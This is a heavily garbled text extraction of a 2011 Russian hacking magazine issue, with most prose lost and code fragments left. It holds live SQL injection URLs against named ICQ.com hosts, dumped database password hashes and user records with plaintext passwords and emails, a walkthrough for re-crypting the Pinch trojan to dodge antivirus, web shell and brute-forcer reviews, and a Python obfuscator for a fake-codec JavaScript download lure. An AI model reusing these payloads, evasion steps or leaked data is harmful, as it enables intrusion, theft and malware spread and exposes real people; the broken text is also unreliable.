.text:00011F04 mov edi, edi
.text:00011F06 push ebp
.text:00011F07 mov ebp, esp
.text:00011F09 push esi
.text:00011F0A push edi
.text:00011F0B mov edi, [ebp+Entry]
.text:00011F0E mov esi, [edi]
;
7/22/2019 2011 01(144).pdf
49/148
046 X 01 (144) 2011
DX http://kaimi.ru
,
,
,
. IT-, http://kaimi.
ru/quest. -:
SQL
HTML-. .
600, 21.
,
. ,
.
, -
. ,
.
, , , .
help
. , !
0:dx
: , . -
.
ans -, , ,
.
.
1:Kaimi: , -
, .
,
Google. ,
. ,
, .
-,
. 2.
2: Kaimi
:
. , 16 -
. , . ,
, , ,
. ,
, .
ans,
-
, , , SQL- XSS. , , 272 273 . , : .
7/22/2019 2011 01(144).pdf
50/148
Tineye.com! , ,
Babylon.
3: Kaimi
: ,
, . -
PHP-, , -
, ,
. -
dx :). !
. -,
, base64,
, eval
, .
, ...
,
. , -
, ,
. ,
, .
, if. , -, .
true, php-,
,
,
!
4: Kaimi
: PHP, 4.
ROM Dendy, - Kaimi.
, , ,
.
, ,
-
. ... Kaimi - ROM
, , , !
: Hex-, -
( "" "").
Hexposure.
ROM Nesticle, ,
- (, ).
,
.
-
.
, :
80=0
81=1
8A=A
...
tbl. ROM,
Hexposure,
.
- ROM, ,
.
,
, .
, - :).
X 01 (144) 2011 047
PHP
ROM- Hexposure
base64
7/22/2019 2011 01(144).pdf
51/148
7/22/2019 2011 01(144).pdf
52/148
11: dx
: -
. ,
, ,
. -,
(, SoundForge), .
12: Kaimi
: . , ,
. , , QR-,
, Tineye
Google,
, , , qc,
. --
QR- (, zxing.org/w/decode.jspx), -
RAR!.
rar, WinRAR, ,
, , !
RAR-,
, ? ,
PNG-,
, , -
. WinRAR
, ,
.
13: dx
: .
, -
. , , exe-
(, , ..). -
. -
, , Resource Hacker, , .
14: dx
: , ,
.
: ,
, ASCII-
, ,
,
.
, -
. ,
. ,
4. -
, .
15: Kaimi
: , , ,
, .
exe-, --
. ,
. ,
: NES US 89. , ,
NES 1989 .
, , ,
.
NES (ru.wikipedia.org/wiki/___NES/).
1989 , ,
, Ninja Gaiden. exe
, , ,
.
.
! ,
, , -
. , , ;
Kaimi ,
: kaimi.ru/quest_x2/.
, !, , -
,
, , ,
:).
! z
049
!
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
53/148
Refere
r
X-Forwarded
-For
Accept-L
anguage
Coo
kie
Re
fere
r
User-A
gent
X-
Forwarded-
For
Accept-L
anguage
ie
050 X 01 (144) 2011
Wergon
,
. HTTP (HyperText Transfer Protocol -
) -,
-. -
WWW -.
: , , .
RFC, HTTP ( 1.1),
,
.
:
( google.com) -
.
.
: ,
. ,
/. -
IP (). ,
, .
, ,
. - Proxomitron.
, -
. HTTP-.
Proxomitron,
.
.
Headers :
, ,
New. , out.
.
Mozilla Firefox -
. Tamper Data
-
. :
, .
-
.
Modify Headers.
Always on, -
.
. (Add -
, Modify , Filter ),
, ;
. , .
, /-
. -
web-. ,
.
, HTTP- , , , - . ? ?
HTTP-
7/22/2019 2011 01(144).pdf
54/148
X-Forwarded
-For
Accept-L
anguage
Coo
kie
Refere
r
User-A
gent
X-
Forwarded-
For
Accept-L
anguage
Coo
kie
HP-include, -
. -
, ,
. , .
XSS,
.
,
. -
-
XSS
Referer (), ,
( %xx).
-
, Referer.
,
.
XSS. , -
, -
, , .SQL- . , -
, , .
PHP- ,
. .
, GET POST -
.
, , -
.
.
:
">. , -
. '">alert(document.
cookie).
; , , ,
7/22/2019 2011 01(144).pdf
55/148
7/22/2019 2011 01(144).pdf
56/148
X-Forwarded
-For
Accept-L
anguage
Coo
kie
Refere
r
User-A
gent
X-
Forwarded-
For
Accept-L
anguage
Coo
kie
DLE (DataLife
Engine), DLE Referer Module (
) . -
ICQ UIN-
MySQL-,
,
, -
.
php.ru
Referer XFF.
. :
MySQL Error = You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near
'"')' at line 1
SQL = INSERT INTO oops_sessions (ID,UID,START,LAST,I
PS,PAGES,PAGE,DATA,REFFER) VALUES ('dpdu7rh90ehfsc62
','0',1238958331,1238958331,'xxx.xxx.xxx.xxx',1,'/',
'a:1:{s:8:"USERNAME";s:10:"";}','SQL-Inj'here')
cx75planet.ru. User-Agent XFF. IPB
. ,
SQL-, -
, ..
:).
PHP, SQL-
. , , ,
. -
GET, POST Cookie. ,
, .
,
request, :
$headers = array (
'User-Agent: Babytoy/0.5',
'Referer: http://refrefref.ref/omg.pl'
);
$html = request_socket('http://127.0.0.1/
showmeheaders.php',$headers);
echo $html;
PHP
( DVD):
. :
$packet = "GET {$url} HTTP/1.1\r\n"
. "Host: {$host}\r\n"
. implode("\r\n", $headers) . "\r\n"
. "Connection: Close\r\n\r\n";
- file_get_contents()
:
$opts = array (
'http' => array (
'header' => implode("\r\n", $headers) . "\r\n"
)
);
$context = stream_context_create($opts);
return file_get_contents($url, false, $context);
Curl
curl: -
curl_setopt($ch, CURLOPT_
HTTPHEADER, $headers);
, .
JavaScript, Flash,
. NoScript
AdBlock. ,
, . ! z
053
The Proxomitron. Tamper Data
Tamper Data
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
57/148
054 X 01 (144) 2011
M4 g icq 884888, http://snipper.ru
Changes-
icq.com- 2010 .
-
.
, https://icq.com/password, ,
UIN ,
. , email'-
. ICQ , primary email
, email for login.
-
, ,
.
: ,
,
! ,
.
:
1.;
2. /-
;
3.,
, ;4.
.
.
, -.
, email for login -
, ,
,
, .
:
/
, . ,
, -,
:).
, -
555555558
. ,
https://icq.com/register
,
,
.
,
ICQ.com (-
) search.icq.com (
mail.ru), ,
http://www.icq.com/wit/
:).
-
-icq.
com.
2010 ICQ IM DST AOL. 187 . , .
ICQ:, , ICQ
DST
AOL
7/22/2019 2011 01(144).pdf
58/148
,
ICQ.
:
1.https://icq.com/password,
;
2.
click here;
3. ,
click here -
:
: https://www.icq.com/password/form/
web?form_type=qna&id=1&sn=XXX&show=1
: https://www.icq.com/password/form/
web?form_type=qna&id=2&sn=XXX&show=1
-
,
mail@partner_icq.com. ,
-
.
, -
2010 . -
() -
.
.
, ICQ
:
1. ABV.bg ICQ;
2.
Bigmir.Net;
3.-
,
;
4. Yandex ICQ;
5.
Atlas.sk, MyNet.com, Nana.co.il
.
ICQ.com-
(https://forum.antichat.ru/showthread.php?p=626441) SQL-
greetings.icq.com, , , ,
-
SYBASE ASE 15.0.1. :).
DST ( Mail.ru group -
) - ICQ.com
msgboard , 5.1.45-log )!
(
blogs.icq.com) 17 2010 -
S00pY Snipper.Ru.
,
(-
).
:
http://blogs.icq.com/blogs/blog/
tag/406428869-99999+union+select+1,concat(us
er,0x3a,password),3+from+mysql.user--+
mysql.
user:
localhost:root:*B3A0E433E7AD0F00794196F3C293
1CD66AA89796
%:msgboard_u_rw:*7FBD912E113CF606E410F18C967
487CE935ACFAC
%:scout:*9FD2B52556065163308826C11DD588A6F3
F2ED9E
%:repl:*90414724CBFFFE7B4880631D5E9E7232
C4737680
%:mydbm:*A9C391720DC3B218CD5EFEDFEDB8C55602
EFE2FE
%.aol.com:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
localhost:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
%:ping:*75E75A54E1CF941C40965FD3C39B1937910
2B07B
%:argus:*F5A7D854E9C46784C82EFC0DAE973F6170
3A7224
%:nocdba:*2D48BF42A42234DBBCADDFA0F94C9ED46
0BD1567
%:repcheck:*B58082AC1A96B8580F828E2C730A4E9
1A26DE3B0
%:msgboard_u_ro:*F1D9E0F8627E5AD39CF98BFC58E
344CF4CCACAB4
localhost:repcheck:*B58082AC1A96B8580F828E2C
730A4E91A26DE3B0
icqwebmsdb-d05.db.aol.com:repcheck:*B58082AC
1A96B8580F828E2C730A4E91A26DE3B0
links
http://forum.asechka.ru . http://www.icq.com/en.html ICQ.com. http://snipper.ru/view/23/sql-inekciya-na-blogsicqcom/
SQL- blogs.icq.com. http://snip-per.ru/view/27/vozvrashhenie-ugnannogo-nomera-icq/ ICQ. http://www.rns-pdf.londonstock-exchange.com/rns/7389V_-2010-11-5.pdf - DST IPO. http://russia.blog.nimbuzz.com/2010/11/09/icq-ne-rabotaet-v-nimbuzz/ ICQ Nimbuzz.
X 01 (144) 2011 055
HTTP://WWW
ICQ ABV.bg
SQL- blogs.icq.com
7/22/2019 2011 01(144).pdf
59/148
X 01 (144) 2011056
msgboard.lsps_tb, (Basic distribution
ID QIP')
ICQ.com, GameLand
ICQ tv :).
...
21;Walla
22;HP
23;Prosieben Austria
24;Jetix
25;Rambler Generic
26;Bigmir Belarus
27;Centrum CZ
28;GameLand
29;SUP
30;Puls4
31;Centrum SK
32;Yandex
...
, -
,
blogs.icq.com -
, , SQL-
:).
2010 ICQ-, -
, blogs.icq.com
-
.
:). SQL--
:
http://www.icq.com/greetings/cards/-1111+union+select
+1,concat(user(),0x3a,version(),0x3a,database()),3,4,
5,6,7+from+mysql.user+limit+0,1+--/send/
---
:
http://greetings.icq.com/greetings/cards/-253 union
select null,@@version,null,null,null,null,null,null
,1,null,null,null,null,null,null,null,null,null,nul
l--/
, blogs.icq.com,
.
,
registration_temp, :
regstr_id
regstr_origin
regstr_fname
regstr_lname
regstr_email
regstr_password
regstr_bdate
regstr_question
regstr_answer
regstr_nickname
regstr_lsp
regstr_reg_date
, , , -
icq.com/register-
! ,
, , -
! ,
, :
1.;
2. registration_temp;
3.-
.
:
7/22/2019 2011 01(144).pdf
60/148
greetings/cards/-1111+union+select+1,concat(regstr_
id,0x3a,regstr_origin,0x3a,regstr_fname,0x3a,regstr_
lname,0x3a,regstr_email,0x3a,regstr_
password,0x3a,regstr_bdate,0x3a,regstr_
question,0x3a,regstr_answer,0x3a,regstr_
nickname,0x3a,regstr_lsp,0x3a,regstr_reg_date),3,4,5,
6,7+from+registration_temp+limit+'.($count-1).',1+--/
send/');
$log = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
logger($log);
}
?>
-
, , ,
:). :
12495211:1:Samira.:x3:dadidux33@web.
de:pudding2:1992-12-04 00:00:00:::Samira. x3:0:2010-
11-15 12:30:53
12495219:1:Ivo:Geckovski:sfors_ivo@abv.
bg:a1b2c3d4:1985-03-27 00:00:00:::Ivo
Geckovski:0:2010-11-15 12:30:55
12495225:1:Madlen:Schwarz:Madlenschwarz85@
web.de:bier85:1985-02-05 00:00:00:::Madlen
Schwarz:1006:2010-11-15 12:30:58
12495235:0:Di:Karnavala:di_posh@nxt.
ru:345562iv:1987-04-24 00:00:00:::Di
Karnavala:-2:2010-11-15 12:31:00
12495247:1:Hellow:Kitty:kiska999-85@yandex.
ru:389162aa:1985-05-12 00:00:00:::Hellow
Kitty:3:2010-11-15 12:31:03
- ICQ.com.
https://www.icq.com/register/email_attach.php
(https://www.icq.com/
karma/login_page.php).
, - ICQ.com
, ,
,
-.
,
:). .
, :
, , -
http://www.icq.com/people//edit/ (
https://www.icq.com/register/email_attach.php ),
;
, , -
. -
https://www.icq.com/register/email_attach.php .
-
--
, -
html- :).
, ( ICQ.com):
1. html-:
2.;
3. -
email for login;
4.
https://icq.com/password :).
,
.
,
ICQ .
-,
ICQ,
.
, -
, ,
, -
. .
:).z
057X 01 (144) 2011
ICQ.com
Yandex ICQ
. icq.com/wit
7/22/2019 2011 01(144).pdf
61/148
058 X 01 (144) 2011
"Cr@wler" [email protected]
, , -
. -, -
Pinch (
, -).
,
-
(, ,
RAR- DVD).
-
VMWare Windows XP (
, -
).
, OllyDbg, WinHex, PE- LordPE. , ,
virustotal.com . , ,
, .
,
,
, malware-. , .
7/22/2019 2011 01(144).pdf
62/148
. -
. , .
!
.
. , -
XOR , ,
! ,
(pinch.exe) .
13147810. 13147C26
,
. -
. , :
13147C30 PUSHAD
13147C31 MOV ECX,6C2F
13147C36 MOV EDX,DWORD PTR DS:[ECX+13141000]
13147C3C XOR EDX,76
13147C3F MOV DWORD PTR DS:[ECX+13141000],EDX
13147C45 LOOPD SHORT pinch_pa.13147C36
13147C47 POPAD
13147C48 JMP SHORT pinch_pa.13147810
(,
copy to executable-all modifications,
Save file). , -
, LordPE,
( OEP 13147C30,
) . ;
OllyDbg, ,
(
13147C48 , Shift+F9). ,
6C2F . -
. ! -
. virustotal.com,
. , 31
43 (-
42 43)! .
. -
, . , -
,
(--
,
2009 ).
13147C4B XOR EAX,EAX;
13147C4D PUSH pinch_pa.13147C62;
13147C52 PUSH DWORD PTR FS:[EAX];
13147C55 MOV DWORD PTR FS:[EAX],ESP;
FS:[0]
13147C58 CALL pinch_pa.13147C58;
13147C5D JMP pinch_pa.13145555;
13147C62 POP EAX;
13147C63 POP EAX
13147C64 POP ESP
13147C65 JMP pinch_pa.13147810;
:
13147C62. ,
, ,
13147C58
(JMP pinch_pa.13145555),
. , -
, ,
. ,
( 27 43
).
, -
?
.
, , ,
,
. ,
,
. ,
, -
!
,
, (
). 13147C90 , ,
(4Ch ,
13147C30). ,
. ,
X 01 (144) 2011 059
7/22/2019 2011 01(144).pdf
63/148
X 01 (144) 2011060
OllyDbg , OEP
,
.
13147C90 - NEW OEP
length of code 4c
13147c30 - start of code
13147c7c - end of code
13147C90 60 PUSHAD
13147C91 B9 4C000000 MOV ECX,4C
13147C96 8B91 307C1413 MOV EDX,DWORD PTR
DS:[ECX+13147C30]
13147C9C 83F2 54 XOR EDX,54
13147C9F 8991 307C1413 MOV DWORD PTR
DS:[ECX+13147C30],EDX
13147CA5 ^E2 EF LOOPD SHORT
kadabra_.13147C96
13147CA7 61 POPAD
jmp 13147c30
,
, .
. , -
, PE-, -
ImageBase,
. -
. WinHex -
, : 4D 5A 00 00 (-,
MZ,
PE-!). PE- (
13140000h),
:
13140000 4D DEC EBP
13140001 5A POP EDX
13140002 0000 ADD BYTE PTR DS:[EAX],AL
13140004 0100 ADD DWORD PTR DS:[EAX],EAX
...
13140028 0000 ADD BYTE PTR DS:[EAX],AL
, . , -
,
MZ-,
, . ,
. 13140028.
. -
, ! ,
: , 13140002,
:
13140002 EB 24 JMP SHORT 13140028
, 13140028, :
13140028 -E9 637C0000 JMP 13147c90
-
, LordPE
EntryPoint. , , :
25 43 -
., ,
.conf .data ,
-
. .
,
OllyDbg , ,
! , -
, image base.
Image base , ,
.
Lost in Time, Dr. Web,
: , 15-.
, ,
15000 , . , -
--
,
. , ,
-
, API-,
. -
? .
,
. ,
, . ,
. -
,
. ,
, API- GetLocalTime, -
7/22/2019 2011 01(144).pdf
64/148
7/22/2019 2011 01(144).pdf
65/148
, -
. , callback-
-
.
, TLS (Thread Local Storage)-callback- (, TLS ,
),
, , -
. Callback-
, OEP.
,
, ,
PE-.
TLS-
( callback-).
, , .
.
(13147d80 13147d90), -
.text, .
DWORD , , ,
callback- (13147d96),
callback- (13147da0).
TLS-: 80 7d 14 13 90 7d
14 13 96 7d 14 13 a0 7d 14 13. 13147d5d
( -
).
TLS-.
13147da0, 6 ,
Binary Edit. - 13 14 7d b0 00 00. 4
callback-.
callback-.
13147db0 ,
, :
13147DB0 PUSHAD;
13147DB1 MOV ECX,6D2F;
13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000];
DH
13147DBC XOR DH,CL;
13147DBE MOV BYTE PTR DS:[ECX+13141000],DH; -
13147DC4 LOOPD SHORT 13147DB6;
13147DC6 POPAD;
13147DC7 RETN;
, , -
, ,
-
OllyDbg.
TLS-
PE-. LordPE -
TLS Address 00005d7d (,
OllyDbg). ,
TLS,
callback-, OllyDbg Alt+O ,
,
, System Breakpoint (
, TLS callback-
!).
virustotal.com.
18 43 -
! , -
,
DrWeb, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot,
VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe .
. , -
.
! z
062 X 01 (144) 2011
25%
7/22/2019 2011 01(144).pdf
66/148
>> coding
X-testing ontest
http://lotus.xakep.ru
cr@wler
10
Lotus Symphony Lotusphere-2011.
zenit80 .
-
IBM Lotus Symphony 3. ,
Lotusphere, 2011 .
7/22/2019 2011 01(144).pdf
67/148
7/22/2019 2011 01(144).pdf
68/148
| "abcd..."
+----+--------
+----+--------+
|0004|25XX25XX|
+----+--------+
| "%n%n" |
+----+--------+
+----++
|0000||
+----++
| "" |
+----++
, , , ,
... ,
-
(0xFFFF -1)
memcpy, -
, .
char buffer[32000];
shortint length=getLen(filename, offset); //
length=-1 ~ 0xFFFF
if(length
7/22/2019 2011 01(144).pdf
69/148
blackhat.com/
presentations/bh-usa-06/BH-US-06-Embleton.pdf.
In-Memory Fuzzing, .
?
. , ,
, -
,
.
. ,
; , ,
, (, -
,
..).
, accept,
recv, . CorelanSecurity Team,
redmine.corelan.be:8800/projects/inmemoryfuzzing/files.
, Pydasm (therning.org/magnus/
archives/278) Paimei (openrce.org/downloads/details/208/PaiMei).
, Immunity Debuger
(debugger.immunityinc.com/register.html ). ,
,
) c pvefindaddr.py (redmine.corelan.be:8800/projects/
pvefindaddr). , ,
:
1.;2. pvefindaddr, PyCommand ();
3. pydasm 2.5;4., , installers, -;
5. pydasm Python25\Lib\site-packages\pydbg\pydasm.pyd.
PyDbg 2.5. -
-. , ,
,
. ,
-.
, -
.
.
void func1(char* input)
{
char buffer[255];
unsignedint len=strlen(input);
if(len
7/22/2019 2011 01(144).pdf
70/148
(00401070) .
, strcpy ,
. ,
. -
(,
, ,
). , (vuln.exe
/GS), security cookie
,
, .
::
3*10^6 5*10^3 , 1-3 ;
1*10^6 15*10^3 -, 6-10 ;
:
1*10^5 150 , 0-3 ;
1*10^4 150 , 0-1 .
,
:
http://sites.google.com/
site/felipeandresmanzano. ,
.
,
. .
Sulley peach.. , FTP 329
, -
. ,
.
hotfuzz (hotfuzz.atteq.com).
,
. Hotfuzz peach .
.
, ,
, , -
,
tm_export, tshark (
wireshark). , ,
, .
, , ... !
-
,
peach ( DVD).
!
. , , ,
winappdbg.
.
, -
winappdbg .
: avalanche klee avalanche (http://code.google.com/p/avalanche/):
.
Avalanche
(). , -
.
, . Avalanche
,
stp valgrind (
). :
$ wget http://avalanche.googlecode.com/files/
avalanche-0.2.tar.gz
$ tar -xvf avalanche-0.2.tar.gz
$ cd avalanche-0.2
$ configure --prefix=`pwd`/inst
$ make
$ make install
:
$ ./inst/bin/avalanche --filename=samples/simple/seed
--debug samples/simple/sample2 samples/simple/seed
Avalanche,
avalanche ? -
067
hotfuzz
X 01 (144) 2011
Peach
CustomizedWindowsDebugEngine
Monitor
Recordeddata
agregationNetstatbasedport
scanning
Custompublisher
Mainwindow
Peach inthe middleData
matching
Fuzzing
Hot fuzz
Dialogs
Processhandling
GraphicalUser
Interface
Storingapplicationsettings
Transformationinto Peachstructures
Peach structurescreation
Findingrelations
Data analysis
Filling inmissing
data
Stringstokenization
Data typecorrection
Wireshark libraries
XMLmanipulators
Viewingcrashdetails
Datareceive
Packetreconstruction
Custom
RandomFuzzingstrategy
Datatype-basedfuzzing
UDPsupport
Proxy
TCPsupport
Recording
Custom
Processmonitor
GUICommunicator
Aditionaldata
analysis
Packetsdissection
Configurationfile
generation
Transforming C-structuresinto Python-structures
7/22/2019 2011 01(144).pdf
71/148
winappdbg
Certification of programs for secure information
flow Dorothy E. Denning and Peter J. Denning. 1977
Communication of the ACM.
A lattice model for secure information flow Dorothy E.Denning 1976 Communication of the ACM.
Dytan: A generic dynamic taint analysis framework
James Clause, Wanchun Li, and Alessandro Orso. Georgia
Institute of Technology.
Understanding data lifetime via whole system emulation
Jim Chow, Tal Garfinkel, Kevi Christopher, Mendel Rosenblum
USENIX Stanford University.
LIFT: A Low-Overhead Practical Information Flow Tracking
System for Detecting Security Attacks Feng Qinz Ho-seop
Kim, Yuanyuan zhou, Youfeng Wu - University of Illinois at
Urbana-Champaign.
winappdbg.sourceforge.net/Tools.html . www.fuzzing.org.
avalanche ,
.
, ,
-
,
. -
:
(tainted) ,
(, , -..),
. -
(-
, ,
). ,
,
, -
,
, . Avalanche
Valgrind
(solver/) STP. Avalanche
: () Valgrind
Tracegrind Covgrind,
STP . Tracegrind
-
. -
STP -
. -, STP
(-
), .
,
-
.
. ,
STP
.
-
,
, .
-
(
, -
Valgrind).
Covgrind,
. Covgrind -, Tracegrind,
.
: Avalanche -
,
,
. (tainted
analysis[2-5]), , , -
,
.
STP STP bitvector (-
) . , , -
(loop). ,
,
(loop) (control flow graph). -
:
groups.csail.mit.edu/pag/daikon;
http://research.microsoft.com/
en-us/um/people/sumitg/pubs/vmcai09_cons.pdf;
groups.csail.mit.edu/pag/pubs/annotation-study-
fse2002-abstract.html.
Avalanche , -
. KLEE
(klee.llvm.org).
. z
068 X 01 (144) 2011
7/22/2019 2011 01(144).pdf
72/148023X 01 (144) 2011
PocketBook!
?
?
usability?,
:PocketBook 902.
PocketBook
7/22/2019 2011 01(144).pdf
73/148
070 X 01 (144) 2011
, CISS Research Team http://twitter.com/NTarakanov
5 . 32- - 64- linux
2007 CVE-2007-4573 (bit.ly/CVE-2007-
4573). cliph,
Wojciech Purczynski (, ?).
, 64-
linux, -
32-. (
arch/x86_64/ia32/ia32entry.S), 32-
64-:
sysenter_do_call:
cmpl $(IA32_NR_syscalls-1),%eax
7/22/2019 2011 01(144).pdf
74/148
+ .endm
24 2008
, :).
- movl \offset+72(%rsp),%eax
.endm
2010 Ben Hawkes, -
,
eax. -
Ac1dB1tch3z. Ben
Hawkes' ;).
- cmpl $(IA32_NR_syscalls-1),%eax
+ cmpq $(IA32_NR_syscalls-1),%rax
7/22/2019 2011 01(144).pdf
75/148
X 01 (144) 2011072
trap frame. Tavis Ormandy -
!
. -
. NTVMD-,
csrss API-
,
.
. CPL (Current Privilege Level)
cs
ss, ,
Virtual-8086.
x86 , ,
16 , 20-. : (cs
7/22/2019 2011 01(144).pdf
76/148
7/22/2019 2011 01(144).pdf
77/148
icq 884888, http://snipper.ru
074
:Steam`O Brute:Windows 2000/XP/2003Server/Vista/2008 Server/7: INSIDER
-
,-
steam-.:
(http, socks 4/5);
;
;
good;
error
( , -
).
:
1.
txt- (
login;pass, proxy:port);
2.;
3.-
START.
,
-
,,
.
:Mikstura: *nix/win: Dr.TRO
-php-.
:
;
-
, data:, php://
input;
data: php://input,
;
-
-
;
, -
, full path,
( 15
"../");
( );
HTTP- -
perl-
LWP::Protocol::socks.
.
http://forum.
inattack.ru/Mikstura-Mini-utilita-Dlja-Raboty-
S-Inkludami-t23830.html.
: ITSecTeam Shell v2.1:*nix/win:Amin Shokohi(Pejvak)-
php-.
:).,
--
ITSecTeam Shell v2.1!
-
:
(66 );
;
-
;
-
;
MySQL, MSSQL,
PostgreSQL, Oracle & IBM DB2;
;
, PHP -
safe mode;
Windows;
;
;
-
zip -
;
;
-
( php);
;
-;
DoS;
sql/gzip-;
-
;
;
DDoS-;
;
symlink mod_security -
.htaccess;
;
php;
;
magic_quotes;
.
,
-
, :).
http://itsecteam.
com/en/tools/itsecteam_shell.htm.
: ICQuinValuer
:Windows 2000/XP/2003Server/Vista/2008 Server/7:Dank & DeMerk &NightEagle
.
X-TOOLS
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
78/148075
ICQ-
.
ICQ-
:
(viz/
inviz) ;
( ,
, , , -
, , ..);
-
;
;
;
;
;
.
-
,
:).
forum.asechka.ru/showthread.php?t=118542.
: Easteregger:Windows 2000/XP/2003Server/Vista/2008 Server/7: ,
.-
. Eastegger
:).
(),
.
,
,,, -
,
.
.
-
:
1. (, -
, -
);
2.-, , -
,.
,
Torrent. :
:WSO Krist_ALL edition:*nix/win:Krist_ALL-
-
WSO.Krist_ALL
,:
(
downloader', -
, , -
,
);
( writable,
);
-
,
(
INFO);
-
;
-
( -
);
;
INFO;
;
php-
,
php;
milw0rm;
;
$t
(1 ,
2 );
.
http://exploit.in/forum/index.
php?showtopic=40939.z
.
Help-About Torrent
( Torrent).
torrent -
.
T
(Tris).
P, .
, -
Eastegger',
:).
http://eastegger.com.
: PWGen: Windows 2000/XP/2003Server/Vista/2008 Server/7: Christian Thoeing-
.
PWGen,
-
. -
:
Free Open-Source;
AES SHA-2;
-
(
DLL',
Windows);
(
, ,
);
;
-
;
-
;
.
,
-
http://pwgen-win.
sourceforge.net. *nix-
, -
http://pwgen.sourceforge.
net.
ICQ-
WSO-
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
79/148
X 01 (144) 2011
MALWARE [email protected]
/INTERNET SECURITY () Malware
. , , .
076
, X1.,USB-.
Microsoft SecurityEssentials:,,-,.:,,-64-.2.: KIS, Dr. Web, Nod32, Symantec..Avast.3., cloud-Symantec:,.,Symantec.
STEP , PC_ZONE DVD: Norton Internet
Security.
-
.Idle Mode
,
.
: --
?.,:).,-
.
Symantec-
,
.
,
.-
.
exe-, ,
-
?..,,
:
,-
, .
.
,-
,.
.
,,
.
,
1..,
.
(
),
--
:). IM-,
-
.
Dr.Web,-
,.
2. Dr.Web.-.Spyder-
,.
,
.
3. :).,-10KIS.
,,
.
KIS,
.
, X1.MicrosoftSecurity Essentials,,
-.
.
,
,
.-
,,.
2.-:,, AVG,Essentials. -
,-
,,,.
3.-,.
, , ,
:).
, ,.
,
, :
-
anti-malware.ru,,
- Deeoni$ , -
:).
, , :
1., . ?2., . , -
.
3., - . ?
7/22/2019 2011 01(144).pdf
80/148077
, MALWARE1.: KIS2011Dr.Web
,vast!. KIS
(-,,
:)), Dr.Web-
,90-
OneHalf.
,,.
,-
:-,
-
-.
2.Avast!.,
-
.
,
,
,
: ,,
.
.
3.Comodo.-,
Internet Security
,-
.
:),.,
,,
,,
.
, UNIXOID1.
Eset Nod32.
, -Dr.Web
Cureit!
.
-
., :
- (
Win2k3r2) Kerio WinRoute Firewall
McAfee
;
(OpenBSD) Spamd
( greylisting) + Sendmail (-
) + Clamav + Procmail (-
,
Maildir);
(WinXP) Eset Nod32
+ Dr.Web Cureit! + Kaspersky Virus Removal
Tool + MalwareBytes Anti-malware + AVZ (
) + Dr.Web LiveCD (
) + Acronis True Image BootCD (
/).
2.
Nod32,
-
.
-.
3.
.
, ,
,
: , :
-
squid (
), havp clamav.-
-
: clamav, havp . Linux
.
.
DEEONI$, - X1. Avast Free Antivirus.
,,
.
.-
, -
.
2., .-,
-
.-,
, ,
.--
, :
,
..
Ok.
3.Avira
AntiVir.-
,,.-
BitDefender, -
- (
) .
X 01 (144) 2011
,ANTI-MALWARE.RU
1.
Windows 7 x64,
,-
.
Microsoft
Security Essentials,-
Avast 5 Free Anti-virus.,
-,
.
2.-
.-
:-
,
,
.
, -
,
, Microsoft, AvastAvira.
,
,
Windows XP,
-
,Kaspersky
Internet Security, Norton Internet
SecurityBitDefender Internet
Security.3.,
-
.-
,
,-
,-
,
-
.
-
-
, Symantec
(Norton), Microsoft, AvastPanda.
-
-
,
,
,.-
Internet SecurityTotal
Security-
(-).
,(
)-
:,
,-
,,
.
-
,
,,
.
Norton 360 --,
,
.z
7/22/2019 2011 01(144).pdf
81/148X 01 (144) 2011
MALWARE presidentua http://tutamc.com
Python .
, . ?
! -
.
80
.
JavaScriptXOR.-
.
JavaScript
.
Internet Explorer,
.,
,,
.
-
JavaScript (,).
:).
,,
.,
,
,-
.
JavaScript.
,
.--
(,
, , ),.
,
.,
.
JS-
078
- ! !
7/22/2019 2011 01(144).pdf
82/148
.
Internet Explorer.., - . :).
warning
WARNING
JavaScripta,
:
function go_codec()
{
location.href = "http://server/codec.exe";
}
var message = "You don't have codec for video";
alert(message);
setTimeout( go_codec(), 1000);
-.
hex-.Python-
,-
:
import random
from string import letters
def morf_html_string(html):
rez = ''
for s in html:
if s in letters and random.choice([True,
False, False, False]):
rez += "%s;" % ord(s)
else:
rez += s
return rez
, (in
letters), 25%hex--
.,aa.
You don't have codec for video-:
"You don't have codec
for video".
, -
.
,+
String.fromCharCode ():
vary a = "co" + "de" + String.fromCharCode(69)
+ "c";
(
).
JavaScript, -
go_codec. ,
.-
, ,
., ,
,go_codec -SDdsdsW,
go_codec -
SDdsdsW.
:
class G(object):
rand_var = {}
.
:
def rand_var(var):
if var in G.rand_var:
return G.rand_var[var]
G.rand_var[var] = generate_string(5, 10)
return G.rand_var[var]
;
, .
, 5
10 , -
.
, generate_
string!:
def generate_string(start=5, end=7):
r = ''
for _ in xrange(random.randrange(
start,end)):
r += random.choice(letters)
return r
, , -
,.
-.
:
var b="aaa";
if ("aaaa"=="sdsdsd") asdasdas();
function sfsf(){};
-
get_el_, -:
X 01 (144) 2011 079
, -
JavaScript
.
-
,
-
.
dvd
DVD
Trial-Reset
7/22/2019 2011 01(144).pdf
83/148X 01 (144) 2011
def get_el_1():
return "var %s='%s';" % (
generate_string(4,6),
generate_string(4,6)
)
(get_
el_1, get_el_2get_el_3):
def random_js_element():
def get_el_1():
return "var %s='%s';" % (
generate_string(),
generate_string()
)
def get_el_2():
return "if ('%s'=='%s') %s();" % (
generate_string(),
generate_string(),
generate_string()
);
def get_el_3():
return "function %s(){}" % (
generate_string())
fnc = "get_el_%s"%random.randrange(1,4)
return locals()[fnc]()
, .
,
locals().
, , -
:
>>> random_js_element()
'function aErfSA(){}'
>>> random_js_element()
"if ('uHsJi'=='YvEwVNttta') pxQdHssd();"
>>> random_js_element()
"var yrSfsdgS='OywZCvq';"
,
.
,-
..-
Template--TornadoWeb.
from tornado.template import Template
template_js = "our_example_template"
js = Template(template_js).generate(
rand_var=rand_var,
morf_html_string=morf_html_string,
random_js_element=random_js_element
)
( template_js)-
JavaScript,-
( Template) .
JS .
Tornado-
. :
{{ random_js_element() }}
function {{ rand_var("go_codec") }}(){
location.href = "{{ morf_html_string("http://
Pythona random randrange choice. , start stop:
random.randrange(start, stop)
. , -. , - 33%:
if random.choice([True, False, False]):
